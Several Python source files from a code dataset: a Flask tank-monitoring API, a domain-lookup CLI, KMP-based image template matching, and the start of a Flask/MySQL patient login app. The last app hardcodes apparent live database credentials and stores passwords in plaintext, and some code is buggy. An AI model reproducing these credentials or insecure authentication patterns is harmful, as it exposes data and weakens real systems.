bson.json_util import dumps\nfrom json import loads\nfrom keys import keys\n\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb+srv://admin:\"+keys[\"password\"]+\"@cluster0.jsdue.mongodb.net/ECSE3038_Lab3?retryWrites=true&w=majority\" \n\nmongo = PyMongo(app)\n\nclass TankSchema(Schema):\n location = fields.String(required=True)\n latitude = fields.Float(required=True)\n longitude = fields.Float(required=True)\n percentage_full = fields.Integer(required=True)\n\n\nclass LevelSchema(Schema):\n tank_id = fields.Integer(required = True)\n percentage_full = fields.Integer(required=True)\n\n\nCORS(app) \napi = Api(app)\n\n@app.route(\"/\")\ndef welcome(): \n return \"Welcome!\"\n\nprofile = {\n \"success\": True,\n \"data\": {\n \"last_updated\": \"2/3/2021, 8:48:51 PM\", \n \"username\": \"coolname\",\n \"role\": \"Engineer\",\n \"color\": \"#3478ff\"\n }\n}\n\nsuccess = {\n \"success\": True,\n \"mssg\": \"data saved in database successfully\",\n \"date\": datetime.now().strftime(\"%c\")\n}\n\ntank_info = []\ntank_id = 0\n\nclass Profile(Resource):\n def get(self):\n return profile\n\n def post(self):\n profile[\"data\"][\"last_updated\"] = datetime.now().strftime(\"%c\")\n profile[\"data\"][\"username\"] = request.json['username']\n profile[\"data\"][\"role\"] = request.json['role']\n profile[\"data\"][\"color\"] = request.json['color']\n return profile\n\n def patch(self):\n profile[\"data\"][\"last_updated\"] = datetime.now().strftime(\"%c\")\n\n data = (request.json)\n for key in data:\n profile[\"data\"][key] = request.json[key]\n \n return profile\n\nclass Data(Resource):\n def get(self):\n tanks = mongo.db.tanks.find()\n return jsonify(loads(dumps(tanks)))\n\n\n def post(self):\n try: \n newTank = TankSchema().load(request.json)\n tank_id = mongo.db.tanks.insert_one(newTank).inserted_id\n tank = mongo.db.tanks.find_one(tank_id)\n return loads(dumps(tank))\n except ValidationError as ve:\n return ve.messages, 400\n \n\n\nclass Data2(Resource):\n def patch(self, id):\n mongo.db.tanks.update_one({\"_id\":id}, {\"$set\": request.json})\n tank = mongo.db.tanks.find_one(id)\n return loads(dumps(tank))\n\n\n def delete(self, id):\n check = mongo.db.tanks.delete_one({\"_id\":id})\n\n if check.deleted_count == 1:\n return {\n \"success\": True\n }\n else:\n return {\n \"success\": False\n }, 400\n\nclass Level(Resource):\n def post (self):\n try:\n tank_id = request.json(\"tank_id\")\n water_level = request.json(\"water_level\")\n\n percentage_full = ((200-water_level)/190) * 100\n\n jsonObject = {\n \"tank_id\": tank_id,\n \"percentage_full\": percentage_full\n }\n mongo.db.levels.insert_one(jsonObject)\n return success \n except ValidationError as ve:\n return ve.messages, 400\n \n\napi.add_resource(Profile, \"/profile\")\napi.add_resource(Data, \"/data\")\napi.add_resource(Data2, \"/data/\")\napi.add_resource(Level, \"/tank\")\n\nif __name__ == \"__main__\":\n app.run(\n debug=True,\n # port = 3000,\n # host = \"0.0.0.0\"\n )\n","sub_path":"Lab6_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"409879077","text":"\"\"\"\nCore functionality for Domainr.\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport configparser\nimport pkg_resources\nimport requests\nimport simplejson as json\nimport sys\nfrom termcolor import colored\n\n\nclass Domain(object):\n \"\"\"Main class for interacting with the domains API.\"\"\"\n\n def environment(self):\n \"\"\"Parse any command line arguments.\"\"\"\n parser = ArgumentParser()\n parser.add_argument('query', type=str, nargs='+',\n help=\"Your domain name query.\")\n parser.add_argument('-i', '--info', action='store_true',\n help=\"Get information for a domain name.\")\n parser.add_argument('--ascii', action='store_true',\n help=\"Use ASCII characters for domain availability.\")\n parser.add_argument('--available', action='store_true',\n help=\"Only show domain names that are currently available.\")\n parser.add_argument('--tld', action='store_true',\n help=\"Only check for top-level domains.\")\n args = parser.parse_args()\n return args\n\n def search(self, env):\n \"\"\"Use domainr to get information about domain names.\"\"\"\n \n query = \" \".join(env.query)\n params = {'q': query}\n\n # Try and get the API key from the config file\n config = configparser.ConfigParser()\n configFilename = pkg_resources.resource_filename('domainr', 'domainr.ini')\n config.read(configFilename)\n \n if config['Default']['mashape-key']:\n params['mashape-key'] = config['Default']['mashape-key']\n url = \"https://domainr.p.mashape.com\"\n elif config['Default']['client_id']:\n params['client_id'] = config['Default']['client_id']\n url = \"https://api.domainr.com\"\n else:\n sys.exit(\"Error: No API key provided in config file at:\\n\"\n + \"{0}\\n\".format(configFilename) \n + \"See the README for more info\")\n\n if env.info:\n url += \"/v1/info\"\n else:\n url += \"/v1/search\"\n\n json_data = requests.get(url, params=params)\n # print(json_data.url)\n\n if not json_data.status_code == 200:\n return \"Error: Status {0}; Response: {1}\".format(json_data.status_code, json_data._content)\n data = self.parse(json_data.content, env)\n if not data:\n return \"No results found\\n\"\n else:\n return data\n\n def parse(self, content, env):\n \"\"\"Parse the relevant data from JSON.\"\"\"\n data = json.loads(content)\n if not env.info:\n # Then we're dealing with a domain name search.\n output = []\n results = data['results']\n for domain in results:\n name = domain['domain']\n availability = domain['availability']\n if availability == 'available':\n name = colored(name, 'blue', attrs=['bold'])\n symbol = colored(u\"\\u2713\", 'green')\n if env.ascii:\n symbol = colored('A', 'green')\n else:\n symbol = colored(u\"\\u2717\", 'red')\n if env.ascii:\n symbol = colored('X', 'red')\n # The available flag should skip these.\n if env.available:\n continue\n string = \"%s %s\" % (symbol, name)\n # Now, a few sanity checks before we add it to the output.\n if env.tld:\n if self._tld_check(domain['domain']):\n output.append(string)\n else:\n output.append(string)\n return '\\n'.join(output)\n # Then the user wants information on a domain name.\n return data\n\n def _tld_check(self, name):\n \"\"\"Make sure we're dealing with a top-level domain.\"\"\"\n if name.endswith(\".com\") or name.endswith(\".net\") or name.endswith(\".org\"):\n return True\n return False\n\n def main(self):\n args = self.environment()\n print(self.search(args))\n","sub_path":"domainr/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41335886","text":"import numpy as np\r\nfrom PIL import Image\r\ndef mtx_similar1(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n '''\r\n 计算矩阵相似度的一种方法。将矩阵展平成向量,计算向量的乘积除以模长。\r\n 注意有展平操作。\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:实际是夹角的余弦值,ret = (cos+1)/2\r\n '''\r\n farr1 = arr1.ravel()\r\n farr2 = arr2.ravel()\r\n len1 = len(farr1)\r\n len2 = len(farr2)\r\n if len1 > len2:\r\n farr1 = farr1[:len2]\r\n else:\r\n farr2 = farr2[:len1]\r\n #~如果矩阵的维度、向量的模长不一样。\r\n numer = np.sum(farr1 * farr2)\r\n denom = np.sqrt(np.sum(farr1**2) * np.sum(farr2**2))\r\n similar = numer / denom # 这实际是夹角的余弦值\r\n return (similar+1) / 2 # 姑且把余弦函数当线性\r\n\r\ndef mtx_similar2(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n '''\r\n 计算对矩阵1的相似度。相减之后对元素取平方再求和。因为如果越相似那么为0的会越多。\r\n 如果矩阵大小不一样会在左上角对齐,截取二者最小的相交范围。\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:相似度(0~1之间)\r\n '''\r\n if arr1.shape != arr2.shape:\r\n minx = min(arr1.shape[0],arr2.shape[0])\r\n miny = min(arr1.shape[1],arr2.shape[1])\r\n differ = arr1[:minx,:miny] - arr2[:minx,:miny]\r\n else:\r\n differ = arr1 - arr2\r\n numera = np.sum(differ**2)\r\n denom = np.sum(arr1**2)\r\n similar = 1 - (numera / denom)\r\n return similar\r\n\r\n\r\ndef mtx_similar3(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n '''\r\n From CS231n: There are many ways to decide whether\r\n two matrices are similar; one of the simplest is the Frobenius norm. In case\r\n you haven't seen it before, the Frobenius norm of two matrices is the square\r\n root of the squared sum of differences of all elements; in other words, reshape\r\n the matrices into vectors and compute the Euclidean distance between them.\r\n difference = np.linalg.norm(dists - dists_one, ord='fro')\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:相似度(0~1之间)\r\n '''\r\n if arr1.shape != arr2.shape:\r\n minx = min(arr1.shape[0],arr2.shape[0])\r\n miny = min(arr1.shape[1],arr2.shape[1])\r\n differ = arr1[:minx,:miny] - arr2[:minx,:miny]\r\n #~如果矩阵的大小不一样\r\n else:\r\n differ = arr1 - arr2\r\n dist = np.linalg.norm(differ, ord='fro')\r\n len1 = np.linalg.norm(arr1)\r\n len2 = np.linalg.norm(arr2) # 普通模长\r\n denom = (len1 + len2) / 2\r\n similar = 1 - (dist / denom)\r\n return similar\r\n\r\n\r\nimport random\r\ndef find_position_process(page:str,pic:str):\r\n '''\r\n 问题:在一个大图中查找一个小图/模板图\r\n 这是基础但低效的算法,效率之低而几乎不会用——在我的电脑上一张一千多像素宽度的图查一个400*400图用了超过20min。\r\n :param page:大图\r\n :param pic:小图\r\n :return:打印匹配度较高的位置\r\n '''\r\n pageArr = np.array(Image.open(page).convert('L'))\r\n picArr = np.array(Image.open(pic).convert('L')) # 首先转换成灰度图像\r\n hei,wid = picArr.shape\r\n # if hei > 600:\r\n # #太大了,裁一个400*400以内的小块,用之预比较\r\n # hStart = int(random.uniform(0,hei-400))\r\n # if wid > 400:\r\n # wStart = int(random.uniform(0,wid-400))\r\n # smallArr = picArr[hStart:hStart + 400, wStart:wStart + 400]\r\n # else:\r\n # smallArr = picArr[hStart:hStart + 400,:]\r\n # elif wid > 600:\r\n # wStart = int(random.uniform(0,wid-400))\r\n # smallArr = picArr[:, wStart:wStart+400] # 好吧,实际上保证是比较块一定在600*600以内\r\n # else:\r\n #……发现可能大的子图比较的反而快\r\n smallArr = picArr\r\n sHei, sWid = smallArr.shape\r\n for i in range(0,hei - sHei):\r\n if i%100 == 0:\r\n print('do i:', i)\r\n for k in range(0, wid - sWid):\r\n sim = mtx_similar2(smallArr, pageArr[i: i+sHei, k: k+sWid])\r\n if sim > 0.95:\r\n print(i,k)\r\n\r\n#:: 一段网上找到的openCV代码,也是滑动窗口法,慢。\r\n# # 简单定位图片\r\n# import cv2\r\n# # import numpy as np\r\n#\r\n# def showpiclocation(img, findimg): # 定义定位函数\r\n# # 定位图片\r\n# w = img.shape[1] # 返回img的第二维度长度---宽度\r\n# h = img.shape[0] # 返回img的第一维度长度---高度\r\n# fw = findimg.shape[1]\r\n# fh = findimg.shape[0]\r\n# findpt = None\r\n# for now_h in range(0, h - fh):\r\n# for now_w in range(0, w - fw):\r\n# comp_tz = img[now_h:now_h + fh, now_w:now_w + fw, :] - findimg\r\n# if np.sum(comp_tz) < 1:\r\n# findpt = now_w, now_h\r\n#\r\n# if findpt != None:\r\n# cv2.rectangle(img, findpt, (findpt[0] + fw, findpt[1] + fh), (0, 0, 255)) # opencv函数画矩形\r\n# return img\r\n#\r\n# fn = '00000033.tif'\r\n# fn1 = '000000331.jpg'\r\n# # fn2 = 'pictestt2.png'\r\n# myimg = cv2.imread(fn)\r\n# myimg1 = cv2.imread(fn1)\r\n# # myimg2 = cv2.imread(fn2)\r\n# myimg = showpiclocation(myimg, myimg1)\r\n# # myimg = showpiclocation(myimg, myimg2)\r\n# cv2.namedWindow('img')\r\n# cv2.imshow('img', myimg)\r\n# cv2.waitKey()\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n#:KMP字符串匹配算法\r\ndef KMP(bigStr:str, smallStr:str, all = False)->(list, bool, int):\r\n '''\r\n KMP算法,用于查找后字符串在前面字符串的匹配位置。\r\n :param bigStr: 包含的字符串\r\n :param smallStr: 要检测是否含有的字串\r\n :param all: 是否要找到所有的位置。默认为false\r\n :return: 匹配(或最佳匹配)的位置的列表,从0开始,-1为完全没有找到。\r\n bool变量是否是精确匹配。最后第三个返回值是匹配的长度。\r\n '''\r\n def cal_next(string:str)->np.ndarray:\r\n '''\r\n KMP算法所需要的子函数\r\n :param string:\r\n :return:\r\n '''\r\n k = -1\r\n length = len(string)\r\n nextArr = -np.ones(length,dtype=int) #全赋值为-1,不过算法里只要【0】赋值为-1即可\r\n for qq in range(1,length):\r\n while string[k + 1] != string[qq] and k>-1: # 第一个放过\r\n k = nextArr[k] # 向前回溯。qq一定大于k,故安全\r\n if string[k+1] == string[qq]:\r\n k += 1\r\n nextArr[qq] = k\r\n return nextArr\r\n\r\n nextA = cal_next(smallStr)\r\n kk = -1\r\n exact = False\r\n bestPos = list()\r\n bestK = -1 # store the answer\r\n bigLen = len(bigStr)\r\n smaLen = len(smallStr)\r\n for ii in range(0,bigLen):\r\n while bigStr[ii] != smallStr[kk+1] and kk>-1:\r\n kk = nextA[kk]\r\n if bigStr[ii] == smallStr[kk+1]:\r\n kk += 1\r\n if kk > bestK:\r\n bestK = kk\r\n bestPos = [ii-kk,]\r\n elif kk == bestK:\r\n bestPos.append(ii - kk)\r\n else:\r\n pass\r\n if kk == smaLen - 1:\r\n exact = True\r\n if not all: #只要一个就好的话\r\n # return ii - kk, exact\r\n return bestPos, exact, bestK+1\r\n else:\r\n kk = -1 # 找到了一个完全匹配,继续开始\r\n return bestPos, exact, bestK+1\r\n\r\n\r\ndef KMP_int_near(bigStr:str, smallStr:str, all = False, near = 0)->(list,bool, int):\r\n '''\r\n 查找后字符串在前面字符串的匹配位置。\r\n :param bigStr: 包含的字符串\r\n :param smallStr: 要检测是否含有的字串\r\n :param all: 是否要找到所有的位置。默认为false\r\n :return: 匹配(或最佳匹配)的位置的列表,从0开始,-1为完全没有找到。\r\n bool变量是否是精确匹配。最后第三个返回值是匹配长度。\r\n '''\r\n nearEqua = lambda a,b: ab-near\r\n\r\n def cal_next(string:str)->np.ndarray:\r\n k = -1\r\n length = len(string)\r\n nextArr = -np.ones(length,dtype=int) #全赋值为-1,不过算法里只要【0】赋值为-1即可\r\n for qq in range(1,length):\r\n\r\n while not nearEqua(string[k + 1], string[qq]) and k>-1: # 第一个放过\r\n k = nextArr[k] # 向前回溯。qq一定大于k,故安全\r\n if nearEqua(string[k + 1], string[qq]):\r\n k += 1\r\n nextArr[qq] = k\r\n return nextArr\r\n\r\n nextA = cal_next(smallStr)\r\n kk = -1\r\n exact = False\r\n bestPos = list()\r\n bestK = -1 # store the answer\r\n bigLen = len(bigStr)\r\n smaLen = len(smallStr)\r\n for ii in range(0,bigLen):\r\n while not nearEqua(bigStr[ii], smallStr[kk+1]) and kk>-1:\r\n kk = nextA[kk]\r\n if nearEqua(bigStr[ii], smallStr[kk+1]):\r\n kk += 1\r\n if kk > bestK:\r\n bestK = kk\r\n bestPos = [ii-kk,]\r\n elif kk == bestK:\r\n bestPos.append(ii - kk)\r\n else:\r\n pass\r\n if kk == smaLen - 1:\r\n exact = True\r\n if not all: #只要一个就好的话\r\n # return ii - kk, exact\r\n return bestPos, exact, bestK+1\r\n else:\r\n kk = -1 # 找到了一个完全匹配,继续开始\r\n return bestPos, exact, bestK+1\r\n\r\n\r\ndef testKMP():\r\n a = '100100001111010101011111100'\r\n b = '11110'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n a = 's ixdsrvsnkjandsoicnzxjdskcasdajnc'\r\n b = 'sxzihih'\r\n poiList, ex, le = KMP(a, b)\r\n print(poiList,ex,le)\r\n a = 'bacbababadababacambabacaddababacasdsd'\r\n b = 'ababaca'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n a = 'bacbababadababacambabacaddababacasdsd'\r\n b = '13323'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n\r\n\r\n#---------------------------------------------------------------\r\n\r\ndef find_poi_by_deltaString(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 对小图求差分,得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))\r\n arr22 = np.array(Image.open(picS).convert('L')) # 转换为灰度矩阵。\r\n arr1 = np.round(arr11/128)\r\n arr2 = np.round(arr22/128) # 转成0-1图,小于128的像素点都被当作0。为了更鲁棒。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n tem1 = np.sum(arr2,axis=0,dtype=np.longlong) #投影(简单求和).axis0为上下方向,形成一行\r\n smaStr = np.zeros(sWid-1, dtype=np.longlong) # 矩阵数据类型要选longlong,防止溢出\r\n for k in range(0, sWid-1):\r\n smaStr[k] = tem1[k] - tem1[k+1] # 求差分,长度变为Swid-1\r\n #~ 这里也可以用roll函数。求差分是为了更加鲁棒。一般像素之间的差分变动的要小。\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n tem = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) #投影(求和)\r\n bigStr = np.zeros(Wid-1,dtype=np.longlong)\r\n for k in range(0, Wid - 1):\r\n bigStr[k] = tem[k] - tem[k + 1] # 求差分,长度变为wid-1\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True) # 为了更鲁棒,可用KPM_int_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws) # 注意是嵌套的两个列表\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid-1)\r\n #~\r\n\r\n\r\n\r\nfrom scipy.ndimage import filters\r\ndef find_poi_by_GuassianString(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。这是一个实验版本。\r\n result:效果不佳\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 对灰度图进行了高斯模糊,试图增强其鲁棒性。但反而并没有。\r\n 原因可能是出现在边缘。因为对大图进行高斯模糊再切成小块,大图的小块的边缘受到了其周围的像素的干扰。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))/16\r\n arr22 = np.array(Image.open(picS).convert('L'))/16\r\n arr1 = filters.gaussian_filter(arr11,sigma=1)\r\n arr2 = filters.gaussian_filter(arr22,sigma=1) # 用高斯滤波增强鲁棒\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n smaStr = np.sum(arr2,axis=0,dtype=np.longlong) #向x轴投影(求和),不再求差分\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True)\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws) # 注意是嵌套的两个列表\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Height , width is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n # ~ 发现高斯滤波的效果反而不好\r\n\r\n\r\ndef find_poi_by_String(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。但这里没有求图像的差分。\r\n result:看情况,只要噪声不大用这个版本就好\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互���叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))\r\n arr22 = np.array(Image.open(picS).convert('L'))\r\n arr1 = np.round(arr11/128)\r\n arr2 = np.round(arr22/128) # 为了更鲁棒。数值可以调。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n smaStr = np.sum(arr2,axis=0,dtype=np.longlong) #向x轴投影(求和)\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True) # 为了更鲁棒,可用KPM_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\ndef find_poi_by_StringMean(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。不求差分,用平均值增强鲁棒。\r\n 同时还可以考虑使用KPM—near\r\n result:效果可以。\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr1 = np.array(Image.open(picB).convert('L'))\r\n arr2 = np.array(Image.open(picS).convert('L')) # 转灰度矩阵,不再进行粒度模糊。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n smaStr = np.mean(arr2,axis=0,dtype=np.longlong) #向x轴投影(求均值)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.mean(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求均值)\r\n #:use Kmp\r\n temws, fit, teml = KMP_near(bigStr,smaStr,True,2) # 为了更鲁棒,可用KPM_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\ndef find_poi_by_StringMean2(picB, picS):\r\n '''\r\n 增加了方向选择,增强效率。因为KMP算法是相对很快的。\r\n 在一个图片中查找一个子图/模板图的位置。不求差分,用平均值增强鲁棒。\r\n 同时还可以考虑使用KPM—near\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr1 = np.array(Image.open(picB).convert('L'))\r\n arr2 = np.array(Image.open(picS).convert('L'))\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n # sWid = int(sWid/4)\r\n # 发现子图变小后,搜索时间反而变长了—— Wid次的字符串比较才是影响时间效率的主要因素\r\n if Hei > Wid:\r\n dirc = 1 # 向y轴投影更好\r\n smaStr = np.mean(arr2[:,:sWid], axis=dirc, dtype=np.longlong) # 向x\\y轴投影(求和)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Wid - sWid + 1):\r\n bigStr = np.mean(arr1[:, i:i + sWid], axis=dirc, dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temHeis, fit, temlen = KMP_int_near(bigStr, smaStr, True, 2) # 为了更鲁棒,可用KPM_near\r\n if temlen > bestFitLen:\r\n bestWidth = [i]\r\n bestFitLen = temlen\r\n bestHeight = [temHeis, ]\r\n elif temlen == bestFitLen:\r\n bestHeight.append(temHeis)\r\n bestWidth.append(i)\r\n else:\r\n pass\r\n else:# 向x轴投影\r\n dirc = 0\r\n smaStr = np.mean(arr2[:,:sWid], axis=dirc, dtype=np.longlong) # 向x\\y轴投影(求和)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei - sHei + 1):\r\n bigStr = np.mean(arr1[i:i + sHei, :], axis=0, dtype=np.longlong) # 向x轴投影(求和)\r\n #:use Kmp\r\n temws, fit, temlen = KMP_near(bigStr, smaStr, True, 2) # 为了更鲁棒,可用KPM_near\r\n if temlen > bestFitLen:\r\n bestWidth = [temws, ]\r\n bestFitLen = temlen\r\n bestHeight = [i]\r\n elif temlen == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('bestHeight is:', bestHeight)\r\n print('bestWidth is:', bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\n\r\n# import time\r\n# c1 = time.clock()\r\n# # find_poi_by_StringMean('big.jpg','inbig2.jpg')\r\n# find_poi_by_StringMean3('00000033.tif','000000331.jpg')\r\n# c2 = time.clock()\r\n# print(c1,c2)\r\n","sub_path":"findPicPosition.py","file_name":"findPicPosition.py","file_ext":"py","file_size_in_byte":21659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"505832368","text":"class A:\n classvar1=23\n def __init__(self):\n self.var=\"name\"\n self.var1=\"class\"\n\n # my first class\n# format of searching varables ,instance varaible of object class -instance variable of inherited class- class variable of object class -class variable of inherited class\n# if there is a func,att of same name (inherited with one ) in two classes the object class override the inherted func ,att\n\nclass B(A):\n def __init__(self):\n # self.var=\"bname\"\n # self.var1='bclass'\n super().__init__() #here super method call my super file constructor\n # self.var = \"bname\"\n # self.var1='bclass'\n\n\nsam=B()\n\nprint(sam.var1)","sub_path":"super() and overridding.py","file_name":"super() and overridding.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"227873867","text":"from flask import Flask, render_template, request, redirect, url_for, session, Response, flash, jsonify\nimport MySQLdb.cursors\nimport re\nfrom flask_mysqldb import MySQL\nimport mysql.connector\nfrom mysql import connector\n\napp = Flask(__name__)\napp.secret_key = 'your secret key'\napp.config['MYSQL_HOST'] = 'sql12.freemysqlhosting.net'\napp.config['MYSQL_USER'] = 'sql12538682'\napp.config['MYSQL_PASSWORD'] = '2lTH75ycyC'\napp.config['MYSQL_PORT'] = 3306\napp.config['MYSQL_DB'] = 'sql12538682'\n\nmysql = MySQL(app)\n\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef login():\n return render_template('login.html')\n\n\n@app.route(\"/register\", methods=[\"POST\", \"GET\"])\ndef resister():\n msg = ''\n if request.method == 'POST' and 'name' in request.form and 'pwd' in request.form:\n name = request.form['name']\n mail = request.form['mail']\n pwd = request.form['pwd']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n sql = 'insert into patient (name,mail,pwd) values(%s,%s,%s)'\n values = (name, mail, pwd)\n cursor.execute(sql, values)\n mysql.connection.commit()\n print('hi')\n\n return jsonify({'success': 'Account not found'})\n return render_template('login.html')\n\n\n@app.route(\"/home\", methods=[\"POST\", \"GET\"])\ndef home():\n msg = ''\n if request.method == 'POST' and 'mail' in request.form and 'pwd' in request.form:\n mail = request.form['mail']\n pwd = request.form['pwd']\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'select * from patient where mail= %s and pwd =%s', (mail, pwd))\n account = cursor.fetchone()\n cursor.execute('select * from doctor')\n doctor = cursor.fetchall()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('select * from consult where patient_mail= %s', [mail])\n consult = cursor.fetchall()\n if consult:\n\n c = []\n for i in range(0, len(consult)):\n c.append(consult[i]['doctor_id'])\n else:\n c = []\n\n cursor.execute(\n \"SELECT distinct a.name , a.dept, a.link, b.status , b.timing from doctor a, consult b where a.id=b.doctor_id and b.patient_mail= %s \", [mail])\n status = cursor.fetchall()\n if status:\n status = status\n len1 = len(status)\n else:\n status = 0\n len1 = 0\n\n if account:\n session['loggedin'] = True\n session['s_mail'] = account['mail']\n 